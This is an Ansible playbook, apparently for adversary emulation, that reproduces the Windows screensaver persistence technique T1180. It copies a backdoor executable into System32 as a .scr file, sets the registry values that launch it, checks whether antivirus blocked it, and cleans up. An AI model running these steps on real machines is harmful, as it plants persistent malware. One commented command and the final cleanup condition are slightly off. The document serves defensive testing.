# attack_technique: T1180
- name: T1180 - Screensaver
  hosts: windows
  vars_files:
   - /opt/ansible/vars.yaml
  tasks:
        - name:
          tags: always
          win_command: |
            cmd /k copy "{{ backdoor_exe }}"  %SystemRoot%\System32\evilscreensaver.scr
        - name: Activate Screen saver
          #reg.exe add "HKEY_CURRENT_USER\Control Panel\Desktop" /v ScreenSaveActive /t REG_SZ /d 1 /f
          tags: always
          win_regedit:
            path: HKCU:\Control Panel\Desktop
            name: ScreenSaveActive
            data: 1
            type: string
        - name: Activate Screen saver timeout
          #reg.exe add "reg.exe add "HKEY_CURRENT_USER\Control Panel\Desktop" /v ScreenSaverTimeout /t REG_SZ /d 3600 /f
          tags: always
          win_regedit:
            path: HKCU:\Control Panel\Desktop
            name: ScreenSaverTimeout
            data: 3600
            type: string
            
        - name: Activate evil backdoor screensaver
          #reg.exe add "HKEY_CURRENT_USER\Control Panel\Desktop" /v SCRNSAVE.EXE /t REG_SZ /d "%SystemRoot%\System32\evilscreensaver.scr" /f
          tags: always
          win_regedit:
            path: HKCU:\Control Panel\Desktop
            name: SCRNSAVE.EXE
            data: '%SystemRoot%\System32\evilscreensaver.scr'
            type: string
            
        - name: sleep for 10 seconds and continue with play to check if AV removed or Not
          tags: always
          wait_for: timeout=10
          delegate_to: localhost		
          
        - name: Check if REG exist
          tags: always
          win_reg_stat:
            path: HKCU:\Control Panel\Desktop
            name: SCRNSAVE.EXE
          register: T1180
       
        - name: check if playbook was blocked
          tags: always
          debug: msg="Playbook Completed#T1180#blocked#win#"
          when: T1180.exists == False        
        - name: check if playbook was successfull
          tags: always
          debug: msg="Playbook Completed#T1180#passed#win#"
          when: T1180.exists
          
        - name: cleanup REG      
          tags: always
          win_regedit:
              path: HKCU:\Control Panel\Desktop
              name: SCRNSAVE.EXE
              state: absent
          when: T1180.exists    
        - name: cleanup Files      
          tags: always
          win_file:
            path:   %SystemRoot%\System32\evilscreensaver.scr
            state: absent
          when: T1180.stat.exists 
